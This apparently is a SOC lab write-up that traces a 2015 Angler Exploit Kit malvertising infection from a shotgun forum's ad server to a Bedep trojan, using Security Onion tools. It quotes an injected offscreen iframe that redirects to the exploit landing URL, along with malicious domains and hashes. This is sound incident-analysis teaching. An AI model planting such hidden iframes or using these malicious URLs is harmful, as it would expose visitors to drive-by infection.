This is a lab analysis based on the resources available on malware.trafficanalysis.net and publicly available information on threat hunting/malware analysis.
Tom and Jake are recent hires at your organization’s Security Operations Center (SOC). Due to their different personalities, they have earned the nickname “Goofus and Gallant” after an American children’s comic strip appearing monthly in Highlights for Children. The comic contrasts the actions of the titular characters, presenting Gallant’s actions as right and good and Goofus’s as bad and wrong. Tom is Goofus. Jake is Gallant.
On the Tuesday 2015-11-24 before Thanksgiving, Tom and Jake are working at the SOC. Tom brought his Windows laptop to the office which has outdated Windows 7, and he plans to browse the web. Jake is hard at work reviewing alerts, and he uses only Linux for surfing the web.
Jake’s holiday plans are set, and he is happy with the frozen turkey he had purchased from the supermarket. Tom’s more of a “turkey enthusiast.” He wants to hunt and kill a turkey for his Thanksgiving meal.
To pursue his holiday plans, Tom decides to purchase a shotgun. He fires up his Windows laptop, connects to the SOC’s WIFI, and starts researching shotguns online. It is not long before Tom’s computer triggers some alerts for suspicious network activity. After those alerts, his laptop crashes!
Screenshot of Tom’s computer crashing.
The goofus Tom will likely be fired at some point due to his poor work ethic. Jake is certainly gallant, but he is still a relatively inexperienced analyst.
We have been assigned to figure out what happened to Tom’s laptop. We checked Tom’s machine and quickly find a suspicious registry entry. It looks like Goofus infected his laptop. The SHA256 hash for the file referenced in the registry is d16ad130daed5d4f3a7368ce73b87a8f84404873cbfc90cc77e967a83c947cd2
Registry entry from the infected Windows laptop
We will use the VirusTotal website (https://www.virustotal.com) to check the hash value that we have obtained from Tom’s laptop. VirusTotal inspects items with over 70 antivirus scanners and URL/domain blacklisting services, in addition to a myriad of tools to extract signals from the studied content. This is illustrated in the screenshot below:
From the above analysis. We ascertained that Tom’s laptop had been infected with the malware, we will have to investigate the root cause and the source of this infection.
To start with further investigation, next you review the network alerts. Unfortunately, Tom’s organization is too cheap for any commercial intrusion detection system (IDS). Fortunately, lower-cost solutions have been implemented; you have access to Snort alerts using the Snort registered ruleset and Suricata alerts using the EmergingThreats free ruleset.
The files which have been retrieved are as follows:
- ZIP file of the PCAP of network traffic to Tom’s laptop: 2015-11-24-traffic-analysis-exercise.pcap.zip 11.7 MB (11,726,615 bytes)
- TXT file of Snort events: 2015-11-24-traffic-analysis-exercise-snort-events.txt 82.4 kB (82,428 bytes)
- TXT file of Suricata events: 2015-11-24-traffic-analysis-exercise-suricata-events.txt 271.6 kB (271,557 bytes)
We would be using the advanced approach to analyze the PCAP of network traffic which differs from the manual analysis with Wireshark and its time-saving approach.
We would be using Security Onion for our analysis. Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It is based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, ELSA, Xplico, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes.
Security Onion comes with various components; we would be focusing on below components in our analysis:
Sguil (read more here), created by Bamm Visscher (@bammv), is “The Analyst Console for Network Security Monitoring.” It is the analyst’s right hand, providing visibility into the event data being collected and the context to validate the detection.
Enterprise Log Search and Archive (ELSA read more here) created by Martin Holste (@mcholste), is “a centralized syslog framework built on Syslog-NG, MySQL, and Sphinx full-text search. It provides a fully asynchronous web-based query interface that normalizes logs and makes searching billions of them for arbitrary strings as easy and fast as searching the web.
There are two approaches that we can start with the analysis
- We can look at Snort and Suricata events that we have obtained and found the indicator of compromise (IOC)
- We can replay the PCAP of network traffic for Tom’s laptop on Security Onion network monitoring interface and analyze the detections with a set of integrated inbuilt security tools to identify the IOC.
We would be following the Second approach for our analysis. Once the Security Onion setup is ready and running, we can replay the PCAP with the following command
Sudo tcpreplay -ieth0 -M10 <pcapfile>
Here, Tcpreplay is a suite of free Open Source utilities for editing and replaying previously captured network traffic. Originally designed to replay malicious traffic patterns to Intrusion Detection/Prevention Systems.
-I specifies the network interface on which Security Onion is running
-M specifies the speed to which the traffic would be replayed in MB/s
After successfully replaying the PCAP file on Security Onion network interface, login into the Sguil as illustrated in the following image
As illustrated in the above screenshot, ETPRO and Snort ruleset shows that there are multiple events of Angler Exploit Kit detection and it seems to have been successful as we can see payload has downloaded. An exploit kit (EK) is the method for widespread malware distribution, EKs are designed to work behind the scenes while a potential victim is browsing the web. An EK does not require any additional action by the end user. Read more about the Angler Exploit Kit here.
Now the question is, how did GOOFUS Tom’s computer get to the EK server? It either came from a compromised website or possibly through gate traffic that we will investigate. (Read more about gate traffic here)
As we have identified the suspicious IP address 184.108.40.206 from which the infection has been initiated. We can check the status of the IP address with Sguil inbuilt whois records which is flagged for sending angler EK payload or from the below websites
To further dig down we will use Enterprise Log Search and Archive (ELSA). We will login into ELSA web console and search for the IP address 220.127.116.11 in the search query. Illustrated in the below screenshot
Bro_DNS records show below details
- Source IP address 10.1.25.119 from which the requests have been initiated at
- Remote IP address 18.104.22.168 with hostname neuhaus-hourakus.avelinoortiz.com.
We are going to quickly analyze the hostname neuhaus-hourakus.avelinoortiz.com on VirusTotal to see if there is any malware hosted on this domain
As we can see various AV engines flagged this domain as malicious.
We need to find out the chain of events to ascertain on the incident that has initiated from neuhaus-hourakus.avelinoortiz.com, we will go to the programs in ELSA to see the type of request has been captured/identified by different programs.
Here, we can see that five programs (security rules) have identified the requests made to the IP address 22.214.171.124. Considering this we will focus on the Bro_HTTP proxy logs to investigate more into the remote host neuhaus-hourakus.avelinoortiz.com
Using Bro_HTTP filter, we can observe the individual request made to the remote host and the response received. As illustrated in the following snapshot we can generate the PCAP version of the requests and observe for any malicious activity.
Above screenshot illustrate request/response captured by BRO proxy, the requests have been made to remote host neuhaus-hourakus.avelinoortiz.com on Tue, 24 Nov 2015 17:13:18 GMT.
So, we can see the URI (/forums/viewforum.php?f=15&sid=0I.h8f0o304g67j7zI29) from where exploit was downloaded. The domain/URL that redirected the user to a malicious host is referred by http://solution.babyboomershopping.org/respondents/header.js
can be seen in the referrer header.
To verify each and every request/response manually for malicious content or file delivered by the remote host is going to be a very time-consuming task. We will simply download the PCAP file which is highlighted in the above screenshot 10.1.25.119:49442_126.96.36.199:80-6-149645-4930.pcap and analyze it with the inbuilt tool in the security onion.
We will be using NetworkMiner tool in Security Onion to analyze the PCAP file that we have downloaded from ELSA, Read more on Network Miner here.
We will just import the pcap file to the NetworkMiner, as illustrated in the following screenshot
We can observe the details of the source IP address, OS running, destination IP address, and remote hostname from PCAP file that we have imported in NetworkMiner. This program tries to extract files and objects from PCAP as illustrated in below screenshot
In files menu, NetworkMiner has identified four files that have been downloaded from the remote host on the source host, out of which three files have HTML content, and one file is of SWF type (who.olp.5AACF8C1..swf) which is a shockwave-flash file. We will save this SWF file locally and will analyze by uploading to VirusTotal website to further analyze for malicious content.
As confirmed by the VirusTotal many antivirus programs have identified this SWF file to be Shockwave Flash Exploit. We will go back and once again look at the PCAP file in ELSA
Now, It can be seen that remote host 188.8.131.52 has served this flash exploit when Tom’s Windows system with IP address 10.1.25.119 connected to the URL http://neuhaus-hourakus.avelinoortiz.com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29 which was referred by URL referrer http://solution.babyboomershopping.org/respondents/header.js
It looks like it is gate traffic. Let’s go to the ELSA and search for referrer domain solution.babyboomershopping.org and filter logs for Bro_HTTP logs as illustrated in the following screenshot.
The first log here is the HTTP request to the URL http://solution.babyboomershopping.org/respondents/header.js which we noted earlier as the referrer for exploit kit website.
Let’s dig down further and look at the content of the JS file “respondents/header.js” illustrated below
BANG!! Now, looking at the request/response for the URL http://solution.babyboomershopping.org/respondents/header.js there is IFRAME in response to the malicious host neuhaus-hourakus.avelinoortiz.com that has hosted the shockwave flash exploit.
<iframe style=”position:absolute;left:-3311px;top:-3861px;width:309px;height:326px;” src=”http://neuhaus-hourakus.avelinoortiz.com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29″></iframe>
Also, looking at the referrer header in above illustration, we can see that infected system was directed to the URL http://solution.babyboomershopping.org/respondents/header.js by site referrer http://www.shotgunworld.com/
Let’s make sure that there isn’t anything else between this gate and the compromised website. Go back to ELSA web console and search for the host www.shotgunworld.com with the Bro_HTTP site filter as illustrated in the following screenshot.
As we can see there are 15 URIs requested by www.shotgunworld.com, we will go to URIs and investigate
Now we can see all the URLs; this is going to take some hunting to go through all the URIs. We have highlighted a URI which is having some interesting things that we will investigate
It can be seen that website www.shotgunworld.com having Ad delivery service on URI /adserver/www/delivery/ajs.php which is serving IFRAME to the malicious website http://solution.babyboomershopping.org/respondents/header.js which is the GATE, this site interns redirects the user to the Shockwave Flash Exploit Kit hosted on website http://neuhaus-hourakus.avelinoortiz.com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29
Malvertising campaigns keep fueling redirections to exploit kits as well but can greatly vary in size and impact. The daily malverts from shady ad networks continue unchanged while the larger attacks going after top ad networks and publishers come in waves.
Moreover, that completes our kill chain for this infection.
Whenever there’s Angler Exploit Kit traffic, most often must be one of the payload: ransomware or Bedep. We can see from the Suricata alerts; this is a Trojan.Bedep infection. Read more on Trojan.Bedep here.
Trojan.Bedep will download more malware (which is also sent encrypted over the network). In this scenario, one piece of follow-up malware was found on the infected host: C:\Users\Turkey-Tom\AppData\Roaming\BackUp1086666136.exe.
There’s more to examine, but that is all I am going through for this article.
- IP Address: 10.1.25.119
- Host Name: Turkey-Tom
- Infection started at Tue, 24 Nov 2015 17:13:18 GMT
- Operating System: Windows 7
SHA256 – d16ad130daed5d4f3a7368ce73b87a8f84404873cbfc90cc77e967a83c947cd2who.olp.5AACF8C1..swf
SHA256 – 470fdb11214c6d274bd0247d7845dc08e6d6d9e9a9c5edc65938c40ed2b0eeae
An exploit kit is an object or a program that attackers use to launch attacks against vulnerable programs.
An attack by a website-hosted exploit kit can succeed only if you visit a page hosting an exploit kit and your device has an unpatched vulnerability that the kit can leverage.
To thwart EK attacks follow simple steps
- Secure Browsing: Use a reputable antimalware product with a website scanning feature to make sure the web page is not silently hosting a harmful component.
- Periodic Patching: Ensure your device and all installed programs are using the latest versions and any applicable security fixes.
Many modern antimalware programs will detect and prevent these exploit kits attempting to leverage a vulnerability. Keep your